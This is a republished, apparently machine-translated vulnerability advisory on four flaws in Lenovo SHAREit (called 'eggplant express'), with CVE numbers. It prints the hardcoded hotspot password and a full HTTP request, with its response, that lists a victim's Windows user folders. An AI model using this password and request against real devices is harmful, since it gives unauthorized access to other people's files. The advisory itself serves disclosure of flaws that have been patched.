Lenovo eggplant express connect has been exposed to multiple vulnerabilities

Source: Internet
Author: User

Lenovo eggplant express connect has been exposed to multiple vulnerabilities

The Lenovo direct it (Eggplant quickbi) service is vulnerable to hard-coded passwords, information leaks, unencrypted sensitive information, and unauthorized vulnerabilities. The vulnerability was submitted by Ivan Huertas, a Security researcher from the Core Security Consulting team, this report is from Joaquín Rodr íguez Varela from the same team.

 

Eggplant fast transmission is the fastest cross-platform near-field transmission software to date. It supports Android, apple, computer, WP, and other devices and more than 30 languages. It is easy to operate and convenient. During transmission, files can be uploaded to each other without traffic, network, or account logon. The transmission speed is 200 times faster than that of Bluetooth. It is also a software that can implement file transfer without clients. Eggplant Express has more than 0.4 billion Loyal users around the world, truly allowing users to share their happiness in their lives.

Verified vulnerabilities include Android 3.0.18 _ ww and Windows 2.5.1.1. Other versions may be affected, but not yet verified. However, Lenovo has released an updated version to fix the vulnerabilities in the above two versions.

1. Lenovo eggplant express pass Windows Version hardcoded password [CVE-2016-1491]

When a file is received using the Lenovo hotspot it Windows version, the password for the wifi hotspot is set to 12345678. Any system with a wireless Nic can use this password to connect to the hotspot. This password is the default one!

2. Lenovo eggplant express pass Windows Remote File Viewing [CVE-2016-1490]

When the wifi hotspot network is enabled and the default password 12345678 is used to connect to the service, http requests can be sent to the WebServer Service (http-like server) started by quick transmission to read files, however, files cannot be downloaded. The requested data packet is as follows:

POST /list?type=file&path=C%3A%5CUsers\admin HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40)Host: 192.168.173.1:2999Connection: Keep-AlivekAccept-Encoding: gzipContent-Length: 0HTTP/1.0 200 OKContent-Length: 2426  {"containers":[{"filepath":"C:\\Users\\admin\\Contacts","has_thumbnail":false,"id":"C:\\Users\\admin\\Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Desktop","has_thumbnail":false,"id":"C:\\Users\\admin\\Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Documents","has_thumbnail":false,"id":"C:\\Users\\admin\\Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Downloads","has_thumbnail":false,"id":"C:\\Users\\admin\\Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Favorites","has_thumbnail":false,"id":"C:\\Users\\admin\\Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Links","has_thumbnail":false,"id":"C:\\Users\\admin\\Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Music","has_thumbnail":false,"id":"C:\\Users\\admin\\Music","isloaded":false,"isroot":false,"isvolume":false,"name":"MyMusic","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Pictures","has_thumbnail":false,"id":"C:\\Users\\admin\\Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"MyPictures","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\SavedGames","has_thumbnail":false,"id":"C:\\Users\\admin\\SavedGames","isloaded":false,"isroot":false,"isvolume":false,"name":"SavedGames","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Searches","has_thumbnail":false,"id":"C:\\Users\\admin\\Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Tracing","has_thumbnail":false,"id":"C:\\Users\\admin\\Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C:\\Users\\admin\\Videos","has_thumbnail":false,"id":"C:\\Users\\admin\\Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My","type":"file","ver":""}],"filepath":"C:\\Users\\admin","has_thumbnail":false,"id":"C:\\Users\\admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}

3. The communication process of eggplant quickbi for Windows and Android is not encrypted [CVE-2016-1489]

Files are not encrypted during http transmission. Attackers can view the transmitted data through the sniffing network or directly launch man-in-the-middle attacks, such as tampering with the transmitted content.

4. Enable public wifi login without a password on Android devices [CVE-2016-1492]

When an application is set to receive files, a public wifi hotspot that can be accessed without a password will also be created. Attackers can capture communication information on these devices when connecting to the wifi.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.